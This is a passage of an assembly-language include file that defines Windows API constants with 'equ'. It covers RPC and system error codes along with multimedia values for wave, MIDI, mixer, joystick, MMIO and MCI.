RPC_S_INTERNAL_ERROR equ 1766
RPC_S_ZERO_DIVIDE equ 1767
RPC_S_ADDRESS_ERROR equ 1768
RPC_S_FP_DIV_ZERO equ 1769
RPC_S_FP_UNDERFLOW equ 1770
RPC_S_FP_OVERFLOW equ 1771
RPC_X_NO_MORE_ENTRIES equ 1772
RPC_X_SS_CHAR_TRANS_OPEN_FAIL equ 1773
RPC_X_SS_CHAR_TRANS_SHORT_FILE equ 1774
RPC_X_SS_IN_NULL_CONTEXT equ 1775
RPC_X_SS_CONTEXT_DAMAGED equ 1777
RPC_X_SS_HANDLES_MISMATCH equ 1778
RPC_X_SS_CANNOT_GET_CALL_HANDLE equ 1779
RPC_X_NULL_REF_POINTER equ 1780
RPC_X_ENUM_VALUE_OUT_OF_RANGE equ 1781
RPC_X_BYTE_COUNT_TOO_SMALL equ 1782
RPC_X_BAD_STUB_DATA equ 1783
ERROR_INVALID_USER_BUFFER equ 1784
ERROR_UNRECOGNIZED_MEDIA equ 1785
ERROR_NO_TRUST_LSA_SECRET equ 1786
ERROR_NO_TRUST_SAM_ACCOUNT equ 1787
ERROR_TRUSTED_DOMAIN_FAILURE equ 1788
ERROR_TRUSTED_RELATIONSHIP_FAILURE equ 1789
ERROR_TRUST_FAILURE equ 1790
RPC_S_CALL_IN_PROGRESS equ 1791
ERROR_NETLOGON_NOT_STARTED equ 1792
ERROR_ACCOUNT_EXPIRED equ 1793
ERROR_REDIRECTOR_HAS_OPEN_HANDLES equ 1794
ERROR_PRINTER_DRIVER_ALREADY_INSTALLED equ 1795
ERROR_UNKNOWN_PORT equ 1796
ERROR_UNKNOWN_PRINTER_DRIVER equ 1797
ERROR_UNKNOWN_PRINTPROCESSOR equ 1798
ERROR_INVALID_SEPARATOR_FILE equ 1799
ERROR_INVALID_PRIORITY equ 1800
ERROR_INVALID_PRINTER_NAME equ 1801
ERROR_PRINTER_ALREADY_EXISTS equ 1802
ERROR_INVALID_PRINTER_COMMAND equ 1803
ERROR_INVALID_DATATYPE equ 1804
ERROR_INVALID_ENVIRONMENT equ 1805
RPC_S_NO_MORE_BINDINGS equ 1806
ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT equ 1807
ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT equ 1808
ERROR_NOLOGON_SERVER_TRUST_ACCOUNT equ 1809
ERROR_DOMAIN_TRUST_INCONSISTENT equ 1810
ERROR_SERVER_HAS_OPEN_HANDLES equ 1811
ERROR_RESOURCE_DATA_NOT_FOUND equ 1812
ERROR_RESOURCE_TYPE_NOT_FOUND equ 1813
ERROR_RESOURCE_NAME_NOT_FOUND equ 1814
ERROR_RESOURCE_LANG_NOT_FOUND equ 1815
ERROR_NOT_ENOUGH_QUOTA equ 1816
RPC_S_GROUP_MEMBER_NOT_FOUND equ 1898
EPT_S_CANT_CREATE equ 1899
RPC_S_INVALID_OBJECT equ 1900
ERROR_INVALID_TIME equ 1901
ERROR_INVALID_FORM_NAME equ 1902
ERROR_INVALID_FORM_SIZE equ 1903
ERROR_ALREADY_WAITING equ 1904
ERROR_PRINTER_DELETED equ 1905
ERROR_INVALID_PRINTER_STATE equ 1906
ERROR_NO_BROWSER_SERVERS_FOUND equ 6118
MAXPNAMELEN equ 32
MAXERRORLENGTH equ 128
TIME_MS equ 1h
TIME_SAMPLES equ 2h
TIME_BYTES equ 4h
TIME_SMPTE equ 8h
TIME_MIDI equ 10h
MM_JOY1MOVE equ 3A0h
MM_JOY2MOVE equ 3A1h
MM_JOY1ZMOVE equ 3A2h
MM_JOY2ZMOVE equ 3A3h
MM_JOY1BUTTONDOWN equ 3B5h
MM_JOY2BUTTONDOWN equ 3B6h
MM_JOY1BUTTONUP equ 3B7h
MM_JOY2BUTTONUP equ 3B8h
MM_MCINOTIFY equ 3B9h
MM_MCISYSTEM_STRING equ 3CAh
MM_WOM_OPEN equ 3BBh
MM_WOM_CLOSE equ 3BCh
MM_WOM_DONE equ 3BDh
MM_WIM_OPEN equ 3BEh
MM_WIM_CLOSE equ 3BFh
MM_WIM_DATA equ 3C0h
MM_MIM_OPEN equ 3C1h
MM_MIM_CLOSE equ 3C2h
MM_MIM_DATA equ 3C3h
MM_MIM_LONGDATA equ 3C4h
MM_MIM_ERROR equ 3C5h
MM_MIM_LONGERROR equ 3C6h
MM_MOM_OPEN equ 3C7h
MM_MOM_CLOSE equ 3C8h
MM_MOM_DONE equ 3C9h
MMSYSERR_BASE equ 0
WAVERR_BASE equ 32
MIDIERR_BASE equ 64
TIMERR_BASE equ 96
JOYERR_BASE equ 160
MCIERR_BASE equ 256
MCI_STRING_OFFSET equ 512
MCI_VD_OFFSET equ 1024
MCI_CD_OFFSET equ 1088
MCI_WAVE_OFFSET equ 1152
MCI_SEQ_OFFSET equ 1216
MMSYSERR_NOERROR equ 0
MMSYSERR_ERROR equ MMSYSERR_BASE+1
MMSYSERR_BADDEVICEID equ MMSYSERR_BASE+2
MMSYSERR_NOTENABLED equ MMSYSERR_BASE+3
MMSYSERR_ALLOCATED equ MMSYSERR_BASE+4
MMSYSERR_INVALHANDLE equ MMSYSERR_BASE+5
MMSYSERR_NODRIVER equ MMSYSERR_BASE+6
MMSYSERR_NOMEM equ MMSYSERR_BASE+7
MMSYSERR_NOTSUPPORTED equ MMSYSERR_BASE+8
MMSYSERR_BADERRNUM equ MMSYSERR_BASE+9
MMSYSERR_INVALFLAG equ MMSYSERR_BASE+10
MMSYSERR_INVALPARAM equ MMSYSERR_BASE+11
MMSYSERR_HANDLEBUSY equ MMSYSERR_BASE+12
MMSYSERR_INVALIDALIAS equ MMSYSERR_BASE+13
MMSYSERR_LASTERROR equ MMSYSERR_BASE+13
MM_MOM_POSITIONCB equ 3CAh
MM_MCISIGNAL equ 3CBh
MM_MIM_MOREDATA equ 3CCh
MIDICAPS_STREAM equ 8h
MEVT_F_SHORT equ 0h
MEVT_F_LONG equ 80000000h
MEVT_F_CALLBACK equ 40000000h
MIDISTRM_ERROR equ -2
MIDIPROP_SET equ 80000000h
MIDIPROP_GET equ 40000000h
MIDIPROP_TIMEDIV equ 1h
MIDIPROP_TEMPO equ 2h
MIXER_SHORT_NAME_CHARS equ 16
MIXER_LONG_NAME_CHARS equ 64
MIXERR_BASE equ 1024
MIXERR_INVALLINE equ MIXERR_BASE+0
MIXERR_INVALCONTROL equ MIXERR_BASE+1
MIXERR_INVALVALUE equ MIXERR_BASE+2
MIXERR_LASTERROR equ MIXERR_BASE+2
MIXER_OBJECTF_HANDLE equ 80000000h
MIXER_OBJECTF_MIXER equ 0h
MIXER_OBJECTF_HMIXER equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIXER
MIXER_OBJECTF_WAVEOUT equ 10000000h
MIXER_OBJECTF_HWAVEOUT equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_WAVEOUT
MIXER_OBJECTF_WAVEIN equ 20000000h
MIXER_OBJECTF_HWAVEIN equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_WAVEIN
MIXER_OBJECTF_MIDIOUT equ 30000000h
MIXER_OBJECTF_HMIDIOUT equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIDIOUT
MIXER_OBJECTF_MIDIIN equ 40000000h
MIXER_OBJECTF_HMIDIIN equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIDIIN
MIXER_OBJECTF_AUX equ 50000000h
MIXERLINE_LINEF_ACTIVE equ 1h
MIXERLINE_LINEF_DISCONNECTED equ 8000h
MIXERLINE_LINEF_SOURCE equ 80000000h
MIXERLINE_COMPONENTTYPE_DST_FIRST equ 0h
MIXERLINE_COMPONENTTYPE_DST_UNDEFINED equ MIXERLINE_COMPONENTTYPE_DST_FIRST+0
MIXERLINE_COMPONENTTYPE_DST_DIGITAL equ MIXERLINE_COMPONENTTYPE_DST_FIRST+1
MIXERLINE_COMPONENTTYPE_DST_LINE equ MIXERLINE_COMPONENTTYPE_DST_FIRST+2
MIXERLINE_COMPONENTTYPE_DST_MONITOR equ MIXERLINE_COMPONENTTYPE_DST_FIRST+3
MIXERLINE_COMPONENTTYPE_DST_SPEAKERS equ MIXERLINE_COMPONENTTYPE_DST_FIRST+4
MIXERLINE_COMPONENTTYPE_DST_HEADPHONES equ MIXERLINE_COMPONENTTYPE_DST_FIRST+5
MIXERLINE_COMPONENTTYPE_DST_TELEPHONE equ MIXERLINE_COMPONENTTYPE_DST_FIRST+6
MIXERLINE_COMPONENTTYPE_DST_WAVEIN equ MIXERLINE_COMPONENTTYPE_DST_FIRST+7
MIXERLINE_COMPONENTTYPE_DST_VOICEIN equ MIXERLINE_COMPONENTTYPE_DST_FIRST+8
MIXERLINE_COMPONENTTYPE_DST_LAST equ MIXERLINE_COMPONENTTYPE_DST_FIRST+8
MIXERLINE_COMPONENTTYPE_SRC_FIRST equ 1000h
MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+0
MIXERLINE_COMPONENTTYPE_SRC_DIGITAL equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+1
MIXERLINE_COMPONENTTYPE_SRC_LINE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+2
MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+3
MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+4
MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+5
MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+6
MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+7
MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+8
MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+9
MIXERLINE_COMPONENTTYPE_SRC_ANALOG equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+10
MIXERLINE_COMPONENTTYPE_SRC_LAST equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+10
MIXERLINE_TARGETTYPE_UNDEFINED equ 0
MIXERLINE_TARGETTYPE_WAVEOUT equ 1
MIXERLINE_TARGETTYPE_WAVEIN equ 2
MIXERLINE_TARGETTYPE_MIDIOUT equ 3
MIXERLINE_TARGETTYPE_MIDIIN equ 4
MIXERLINE_TARGETTYPE_AUX equ 5
MIXER_GETLINEINFOF_DESTINATION equ 0h
MIXER_GETLINEINFOF_SOURCE equ 1h
MIXER_GETLINEINFOF_LINEID equ 2h
MIXER_GETLINEINFOF_COMPONENTTYPE equ 3h
MIXER_GETLINEINFOF_TARGETTYPE equ 4h
MIXER_GETLINEINFOF_QUERYMASK equ 0Fh
MIXERCONTROL_CONTROLF_UNIFORM equ 1h
MIXERCONTROL_CONTROLF_MULTIPLE equ 2h
MIXERCONTROL_CONTROLF_DISABLED equ 80000000h
MIXERCONTROL_CT_CLASS_MASK equ 0F0000000h
MIXERCONTROL_CT_CLASS_CUSTOM equ 0h
MIXERCONTROL_CT_CLASS_METER equ 10000000h
MIXERCONTROL_CT_CLASS_SWITCH equ 20000000h
MIXERCONTROL_CT_CLASS_NUMBER equ 30000000h
MIXERCONTROL_CT_CLASS_SLIDER equ 40000000h
MIXERCONTROL_CT_CLASS_FADER equ 50000000h
MIXERCONTROL_CT_CLASS_TIME equ 60000000h
MIXERCONTROL_CT_CLASS_LIST equ 70000000h
MIXERCONTROL_CT_SUBCLASS_MASK equ 0F000000h
MIXERCONTROL_CT_SC_SWITCH_BOOLEAN equ 0h
MIXERCONTROL_CT_SC_SWITCH_BUTTON equ 1000000h
MIXERCONTROL_CT_SC_METER_POLLED equ 0h
MIXERCONTROL_CT_SC_TIME_MICROSECS equ 0h
MIXERCONTROL_CT_SC_TIME_MILLISECS equ 1000000h
MIXERCONTROL_CT_SC_LIST_SINGLE equ 0h
MIXERCONTROL_CT_SC_LIST_MULTIPLE equ 1000000h
MIXERCONTROL_CT_UNITS_MASK equ 0FF0000h
MIXERCONTROL_CT_UNITS_CUSTOM equ 0h
MIXERCONTROL_CT_UNITS_BOOLEAN equ 10000h
MIXERCONTROL_CT_UNITS_SIGNED equ 20000h
MIXERCONTROL_CT_UNITS_UNSIGNED equ 30000h
MIXERCONTROL_CT_UNITS_DECIBELS equ 40000h
MIXERCONTROL_CT_UNITS_PERCENT equ 50000h
MIXERCONTROL_CONTROLTYPE_CUSTOM equ MIXERCONTROL_CT_CLASS_CUSTOM|MIXERCONTROL_CT_UNITS_CUSTOM
MIXERCONTROL_CONTROLTYPE_BOOLEANMETER equ MIXERCONTROL_CT_CLASS_METER|MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_SIGNEDMETER equ MIXERCONTROL_CT_CLASS_METER|MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_PEAKMETER equ MIXERCONTROL_CONTROLTYPE_SIGNEDMETER+1
MIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER equ MIXERCONTROL_CT_CLASS_METER|MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_BOOLEAN equ MIXERCONTROL_CT_CLASS_SWITCH|MIXERCONTROL_CT_SC_SWITCH_BOOLEAN|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_ONOFF equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+1
MIXERCONTROL_CONTROLTYPE_MUTE equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+2
MIXERCONTROL_CONTROLTYPE_MONO equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+3
MIXERCONTROL_CONTROLTYPE_LOUDNESS equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+4
MIXERCONTROL_CONTROLTYPE_STEREOENH equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+5
MIXERCONTROL_CONTROLTYPE_BUTTON equ MIXERCONTROL_CT_CLASS_SWITCH|MIXERCONTROL_CT_SC_SWITCH_BUTTON|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_DECIBELS equ MIXERCONTROL_CT_CLASS_NUMBER|MIXERCONTROL_CT_UNITS_DECIBELS
MIXERCONTROL_CONTROLTYPE_SIGNED equ MIXERCONTROL_CT_CLASS_NUMBER|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_UNSIGNED equ MIXERCONTROL_CT_CLASS_NUMBER|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_PERCENT equ MIXERCONTROL_CT_CLASS_NUMBER|MIXERCONTROL_CT_UNITS_PERCENT
MIXERCONTROL_CONTROLTYPE_SLIDER equ MIXERCONTROL_CT_CLASS_SLIDER|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_PAN equ MIXERCONTROL_CONTROLTYPE_SLIDER+1
MIXERCONTROL_CONTROLTYPE_QSOUNDPAN equ MIXERCONTROL_CONTROLTYPE_SLIDER+2
MIXERCONTROL_CONTROLTYPE_FADER equ MIXERCONTROL_CT_CLASS_FADER|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_VOLUME equ MIXERCONTROL_CONTROLTYPE_FADER+1
MIXERCONTROL_CONTROLTYPE_BASS equ MIXERCONTROL_CONTROLTYPE_FADER+2
MIXERCONTROL_CONTROLTYPE_TREBLE equ MIXERCONTROL_CONTROLTYPE_FADER+3
MIXERCONTROL_CONTROLTYPE_EQUALIZER equ MIXERCONTROL_CONTROLTYPE_FADER+4
MIXERCONTROL_CONTROLTYPE_SINGLESELECT equ MIXERCONTROL_CT_CLASS_LIST|MIXERCONTROL_CT_SC_LIST_SINGLE|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_MUX equ MIXERCONTROL_CONTROLTYPE_SINGLESELECT+1
MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT equ MIXERCONTROL_CT_CLASS_LIST|MIXERCONTROL_CT_SC_LIST_MULTIPLE|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_MIXER equ MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT+1
MIXERCONTROL_CONTROLTYPE_MICROTIME equ MIXERCONTROL_CT_CLASS_TIME|MIXERCONTROL_CT_SC_TIME_MICROSECS|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_MILLITIME equ MIXERCONTROL_CT_CLASS_TIME|MIXERCONTROL_CT_SC_TIME_MILLISECS|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXER_GETLINECONTROLSF_ALL equ 0h
MIXER_GETLINECONTROLSF_ONEBYID equ 1h
MIXER_GETLINECONTROLSF_ONEBYTYPE equ 2h
MIXER_GETLINECONTROLSF_QUERYMASK equ 0Fh
MIXER_GETCONTROLDETAILSF_VALUE equ 0h
MIXER_GETCONTROLDETAILSF_LISTTEXT equ 1h
MIXER_GETCONTROLDETAILSF_QUERYMASK equ 0Fh
MIXER_SETCONTROLDETAILSF_VALUE equ 0h
MIXER_SETCONTROLDETAILSF_CUSTOM equ 1h
MIXER_SETCONTROLDETAILSF_QUERYMASK equ 0Fh
JOY_BUTTON5 equ 10h
JOY_BUTTON6 equ 20h
JOY_BUTTON7 equ 40h
JOY_BUTTON8 equ 80h
JOY_BUTTON9 equ 100h
JOY_BUTTON10 equ 200h
JOY_BUTTON11 equ 400h
JOY_BUTTON12 equ 800h
JOY_BUTTON13 equ 1000h
JOY_BUTTON14 equ 2000h
JOY_BUTTON15 equ 4000h
JOY_BUTTON16 equ 8000h
JOY_BUTTON17 equ 10000h
JOY_BUTTON18 equ 20000h
JOY_BUTTON19 equ 40000h
JOY_BUTTON20 equ 80000h
JOY_BUTTON21 equ 100000h
JOY_BUTTON22 equ 200000h
JOY_BUTTON23 equ 400000h
JOY_BUTTON24 equ 800000h
JOY_BUTTON25 equ 1000000h
JOY_BUTTON26 equ 2000000h
JOY_BUTTON27 equ 4000000h
JOY_BUTTON28 equ 8000000h
JOY_BUTTON29 equ 10000000h
JOY_BUTTON30 equ 20000000h
JOY_BUTTON31 equ 40000000h
JOY_BUTTON32 equ 80000000h
JOY_POVCENTERED equ -1
JOY_POVFORWARD equ 0
JOY_POVRIGHT equ 9000
JOY_POVBACKWARD equ 18000
JOY_POVLEFT equ 27000
JOY_RETURNX equ 1h
JOY_RETURNY equ 2h
JOY_RETURNZ equ 4h
JOY_RETURNR equ 8h
JOY_RETURNU equ 10h
JOY_RETURNV equ 20h
JOY_RETURNPOV equ 40h
JOY_RETURNBUTTONS equ 80h
JOY_RETURNRAWDATA equ 100h
JOY_RETURNPOVCTS equ 200h
JOY_RETURNCENTERED equ 400h
JOY_USEDEADZONE equ 800h
JOY_RETURNALL equ JOY_RETURNX|JOY_RETURNY|JOY_RETURNZ|JOY_RETURNR|JOY_RETURNU|JOY_RETURNV|JOY_RETURNPOV|JOY_RETURNBUTTONS
JOY_CAL_READALWAYS equ 10000h
JOY_CAL_READXYONLY equ 20000h
JOY_CAL_READ3 equ 40000h
JOY_CAL_READ4 equ 80000h
JOY_CAL_READXONLY equ 100000h
JOY_CAL_READYONLY equ 200000h
JOY_CAL_READ5 equ 400000h
JOY_CAL_READ6 equ 800000h
JOY_CAL_READZONLY equ 1000000h
JOY_CAL_READRONLY equ 2000000h
JOY_CAL_READUONLY equ 4000000h
JOY_CAL_READVONLY equ 8000000h
WAVE_FORMAT_QUERY equ 1h
SND_PURGE equ 40h
SND_APPLICATION equ 80h
WAVE_MAPPED equ 4h
WAVE_FORMAT_DIRECT equ 8h
WAVE_FORMAT_DIRECT_QUERY equ WAVE_FORMAT_QUERY|WAVE_FORMAT_DIRECT
MIM_MOREDATA equ MM_MIM_MOREDATA
MOM_POSITIONCB equ MM_MOM_POSITIONCB
MIDI_IO_STATUS equ 20h
DRV_LOAD equ 1h
DRV_ENABLE equ 2h
DRV_OPEN equ 3h
DRV_CLOSE equ 4h
DRV_DISABLE equ 5h
DRV_FREE equ 6h
DRV_CONFIGURE equ 7h
DRV_QUERYCONFIGURE equ 8h
DRV_INSTALL equ 9h
DRV_REMOVE equ 0Ah
DRV_EXITSESSION equ 0Bh
DRV_POWER equ 0Fh
DRV_RESERVED equ 800h
DRV_USER equ 4000h
DRVCNF_CANCEL equ 0h
DRVCNF_OK equ 1h
DRVCNF_RESTART equ 2h
DRV_CANCEL equ DRVCNF_CANCEL
DRV_OK equ DRVCNF_OK
DRV_RESTART equ DRVCNF_RESTART
DRV_MCI_FIRST equ DRV_RESERVED
DRV_MCI_LAST equ DRV_RESERVED+0FFFh
CALLBACK_TYPEMASK equ 70000h
CALLBACK_NULL equ 0h
CALLBACK_WINDOW equ 10000h
CALLBACK_TASK equ 20000h
CALLBACK_FUNCTION equ 30000h
MM_MICROSOFT equ 1
MM_MIDI_MAPPER equ 1
MM_WAVE_MAPPER equ 2
MM_SNDBLST_MIDIOUT equ 3
MM_SNDBLST_MIDIIN equ 4
MM_SNDBLST_SYNTH equ 5
MM_SNDBLST_WAVEOUT equ 6
MM_SNDBLST_WAVEIN equ 7
MM_ADLIB equ 9
MM_MPU401_MIDIOUT equ 10
MM_MPU401_MIDIIN equ 11
MM_PC_JOYSTICK equ 12
SND_SYNC equ 0h
SND_ASYNC equ 1h
SND_NODEFAULT equ 2h
SND_MEMORY equ 4h
SND_ALIAS equ 10000h
SND_FILENAME equ 20000h
SND_RESOURCE equ 40004h
SND_ALIAS_ID equ 110000h
SND_ALIAS_START equ 0
SND_LOOP equ 8h
SND_NOSTOP equ 10h
SND_VALID equ 1Fh
SND_NOWAIT equ 2000h
SND_VALIDFLAGS equ 17201Fh
SND_RESERVED equ 0FF000000h
SND_TYPE_MASK equ 170007h
WAVERR_BADFORMAT equ WAVERR_BASE+0
WAVERR_STILLPLAYING equ WAVERR_BASE+1
WAVERR_UNPREPARED equ WAVERR_BASE+2
WAVERR_SYNC equ WAVERR_BASE+3
WAVERR_LASTERROR equ WAVERR_BASE+3
WOM_OPEN equ MM_WOM_OPEN
WOM_CLOSE equ MM_WOM_CLOSE
WOM_DONE equ MM_WOM_DONE
WIM_OPEN equ MM_WIM_OPEN
WIM_CLOSE equ MM_WIM_CLOSE
WIM_DATA equ MM_WIM_DATA
WAVE_MAPPER equ -1
WAVE_ALLOWSYNC equ 2h
WAVE_VALID equ 3h
WHDR_DONE equ 1h
WHDR_PREPARED equ 2h
WHDR_BEGINLOOP equ 4h
WHDR_ENDLOOP equ 8h
WHDR_INQUEUE equ 10h
WHDR_VALID equ 1Fh
WAVECAPS_PITCH equ 1h
WAVECAPS_PLAYBACKRATE equ 2h
WAVECAPS_VOLUME equ 4h
WAVECAPS_LRVOLUME equ 8h
WAVECAPS_SYNC equ 10h
WAVE_INVALIDFORMAT equ 0h
WAVE_FORMAT_1M08 equ 1h
WAVE_FORMAT_1S08 equ 2h
WAVE_FORMAT_1M16 equ 4h
WAVE_FORMAT_1S16 equ 8h
WAVE_FORMAT_2M08 equ 10h
WAVE_FORMAT_2S08 equ 20h
WAVE_FORMAT_2M16 equ 40h
WAVE_FORMAT_2S16 equ 80h
WAVE_FORMAT_4M08 equ 100h
WAVE_FORMAT_4S08 equ 200h
WAVE_FORMAT_4M16 equ 400h
WAVE_FORMAT_4S16 equ 800h
WAVE_FORMAT_PCM equ 1
MIDIERR_UNPREPARED equ MIDIERR_BASE+0
MIDIERR_STILLPLAYING equ MIDIERR_BASE+1
MIDIERR_NOMAP equ MIDIERR_BASE+2
MIDIERR_NOTREADY equ MIDIERR_BASE+3
MIDIERR_NODEVICE equ MIDIERR_BASE+4
MIDIERR_INVALIDSETUP equ MIDIERR_BASE+5
MIDIERR_LASTERROR equ MIDIERR_BASE+5
MIM_OPEN equ MM_MIM_OPEN
MIM_CLOSE equ MM_MIM_CLOSE
MIM_DATA equ MM_MIM_DATA
MIM_LONGDATA equ MM_MIM_LONGDATA
MIM_ERROR equ MM_MIM_ERROR
MIM_LONGERROR equ MM_MIM_LONGERROR
MOM_OPEN equ MM_MOM_OPEN
MOM_CLOSE equ MM_MOM_CLOSE
MOM_DONE equ MM_MOM_DONE
MIDIMAPPER equ -1
MIDI_MAPPER equ -1
MIDI_CACHE_ALL equ 1
MIDI_CACHE_BESTFIT equ 2
MIDI_CACHE_QUERY equ 3
MIDI_UNCACHE equ 4
MIDI_CACHE_VALID equ MIDI_CACHE_ALL|MIDI_CACHE_BESTFIT|MIDI_CACHE_QUERY|MIDI_UNCACHE
MOD_MIDIPORT equ 1
MOD_SYNTH equ 2
MOD_SQSYNTH equ 3
MOD_FMSYNTH equ 4
MOD_MAPPER equ 5
MIDICAPS_VOLUME equ 1h
MIDICAPS_LRVOLUME equ 2h
MIDICAPS_CACHE equ 4h
MHDR_DONE equ 1h
MHDR_PREPARED equ 2h
MHDR_INQUEUE equ 4h
MHDR_VALID equ 7h
AUX_MAPPER equ -1
AUXCAPS_CDAUDIO equ 1
AUXCAPS_AUXIN equ 2
AUXCAPS_VOLUME equ 1h
AUXCAPS_LRVOLUME equ 2h
TIMERR_NOERROR equ 0
TIMERR_NOCANDO equ TIMERR_BASE+1
TIMERR_STRUCT equ TIMERR_BASE+33
TIME_ONESHOT equ 0
TIME_PERIODIC equ 1
JOYERR_NOERROR equ 0
JOYERR_PARMS equ JOYERR_BASE+5
JOYERR_NOCANDO equ JOYERR_BASE+6
JOYERR_UNPLUGGED equ JOYERR_BASE+7
JOY_BUTTON1 equ 1h
JOY_BUTTON2 equ 2h
JOY_BUTTON3 equ 4h
JOY_BUTTON4 equ 8h
JOY_BUTTON1CHG equ 100h
JOY_BUTTON2CHG equ 200h
JOY_BUTTON3CHG equ 400h
JOY_BUTTON4CHG equ 800h
JOYSTICKID1 equ 0
JOYSTICKID2 equ 1
MMIOERR_BASE equ 256
MMIOERR_FILENOTFOUND equ MMIOERR_BASE+1
MMIOERR_OUTOFMEMORY equ MMIOERR_BASE+2
MMIOERR_CANNOTOPEN equ MMIOERR_BASE+3
MMIOERR_CANNOTCLOSE equ MMIOERR_BASE+4
MMIOERR_CANNOTREAD equ MMIOERR_BASE+5
MMIOERR_CANNOTWRITE equ MMIOERR_BASE+6
MMIOERR_CANNOTSEEK equ MMIOERR_BASE+7
MMIOERR_CANNOTEXPAND equ MMIOERR_BASE+8
MMIOERR_CHUNKNOTFOUND equ MMIOERR_BASE+9
MMIOERR_UNBUFFERED equ MMIOERR_BASE+10
MMIO_RWMODE equ 3h
MMIO_SHAREMODE equ 70h
MMIO_CREATE equ 1000h
MMIO_PARSE equ 100h
MMIO_DELETE equ 200h
MMIO_EXIST equ 4000h
MMIO_ALLOCBUF equ 10000h
MMIO_GETTEMP equ 20000h
MMIO_DIRTY equ 10000000h
MMIO_OPEN_VALID equ 3FFFFh
MMIO_READ equ 0h
MMIO_WRITE equ 1h
MMIO_READWRITE equ 2h
MMIO_COMPAT equ 0h
MMIO_EXCLUSIVE equ 10h
MMIO_DENYWRITE equ 20h
MMIO_DENYREAD equ 30h
MMIO_DENYNONE equ 40h
MMIO_FHOPEN equ 10h
MMIO_EMPTYBUF equ 10h
MMIO_TOUPPER equ 10h
MMIO_INSTALLPROC equ 10000h
MMIO_PUBLICPROC equ 10000000h
MMIO_UNICODEPROC equ 1000000h
MMIO_REMOVEPROC equ 20000h
MMIO_FINDPROC equ 40000h
MMIO_FINDCHUNK equ 10h
MMIO_FINDRIFF equ 20h
MMIO_FINDLIST equ 40h
MMIO_CREATERIFF equ 20h
MMIO_CREATELIST equ 40h
MMIO_VALIDPROC equ 11070000h
MMIOM_READ equ MMIO_READ
MMIOM_WRITE equ MMIO_WRITE
MMIOM_SEEK equ 2
MMIOM_OPEN equ 3
MMIOM_CLOSE equ 4
MMIOM_WRITEFLUSH equ 5
MMIOM_RENAME equ 6
MMIOM_USER equ 8000h
SEEK_SET equ 0
SEEK_CUR equ 1
SEEK_END equ 2
MMIO_DEFAULTBUFFER equ 8192
MCIERR_INVALID_DEVICE_ID equ MCIERR_BASE+1
MCIERR_UNRECOGNIZED_KEYWORD equ MCIERR_BASE+3
MCIERR_UNRECOGNIZED_COMMAND equ MCIERR_BASE+5
MCIERR_HARDWARE equ MCIERR_BASE+6
MCIERR_INVALID_DEVICE_NAME equ MCIERR_BASE+7
MCIERR_OUT_OF_MEMORY equ MCIERR_BASE+8
MCIERR_DEVICE_OPEN equ MCIERR_BASE+9
MCIERR_CANNOT_LOAD_DRIVER equ MCIERR_BASE+10
MCIERR_MISSING_COMMAND_STRING equ MCIERR_BASE+11
MCIERR_PARAM_OVERFLOW equ MCIERR_BASE+12
MCIERR_MISSING_STRING_ARGUMENT equ MCIERR_BASE+13
MCIERR_BAD_INTEGER equ MCIERR_BASE+14
MCIERR_PARSER_INTERNAL equ MCIERR_BASE+15
MCIERR_DRIVER_INTERNAL equ MCIERR_BASE+16
MCIERR_MISSING_PARAMETER equ MCIERR_BASE+17
MCIERR_UNSUPPORTED_FUNCTION equ MCIERR_BASE+18
MCIERR_FILE_NOT_FOUND equ MCIERR_BASE+19
MCIERR_DEVICE_NOT_READY equ MCIERR_BASE+20
MCIERR_INTERNAL equ MCIERR_BASE+21
